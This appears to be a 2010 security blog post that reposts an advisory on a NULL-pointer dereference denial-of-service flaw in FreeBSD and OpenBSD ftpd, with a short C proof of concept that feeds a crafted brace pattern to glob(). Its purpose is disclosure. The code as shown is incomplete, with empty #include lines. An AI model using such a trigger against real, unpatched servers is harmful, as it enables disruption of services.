FreeBSD and OpenBSD ‘ftpd’ NULL Pointer Dereference Denial Of Service Vulnerability

/*FreeBSD and OpenBSD ‘ftpd’ NULL Pointer Dereference Denial Of Service Vulnerability

The FreeBSD and OpenBSD ‘ftpd’ service is prone to a denial-of-service vulnerability because of a NULL-pointer dereference.

Successful exploits may allow remote attackers to cause denial-of-service conditions. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.

This issue affects the following releases:

FreeBSD 8.0, 6.3, 4.9
OpenBSD 4.5 and 4.6

PoC:
*/

#include
#include

#define MAXUSRARGS 100
#define MAXGLOBARGS 1000

void do_glob() {
glob_t gl;
char **pop;

char buffer[256];
strcpy(buffer, “{A*/../A*/../A*/../A*/../A*/../A*/../A*}”);

int flags = GLOB_BRACE|GLOB_NOCHECK|GLOB_TILDE;
memset(&gl, 0, sizeof(gl));
gl.gl_matchc = MAXGLOBARGS;
flags |= GLOB_LIMIT;
if (glob(buffer, flags, NULL, &gl)) {
printf(“GLOB FAILED!\n”);
return 0;
}
else
// for (pop = gl.gl_pathv; pop && *pop && 1 < (MAXGLOBARGS-1);
for (pop = gl.gl_pathv; *pop && 1 < (MAXGLOBARGS-1);
pop++) {
printf("glob success");
return 0;
}
globfree(&gl);
}

main(int argc, char **argv) {
do_glob();
do_glob();
}

Source

This entry was posted on Friday, March 12th, 2010 at 7:28 pmand is filed under BSD, FreeBSD, Vulnerabilities. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

uncompiled.com

FreeBSD and OpenBSD ‘ftpd’ NULL Pointer Dereference Denial Of Service Vulnerability

Leave a Reply

Categories

Archives

New Files

Comics

Conferences

Exploits

Friends

Music

Organizations

People

Podcasts

Programming

Technology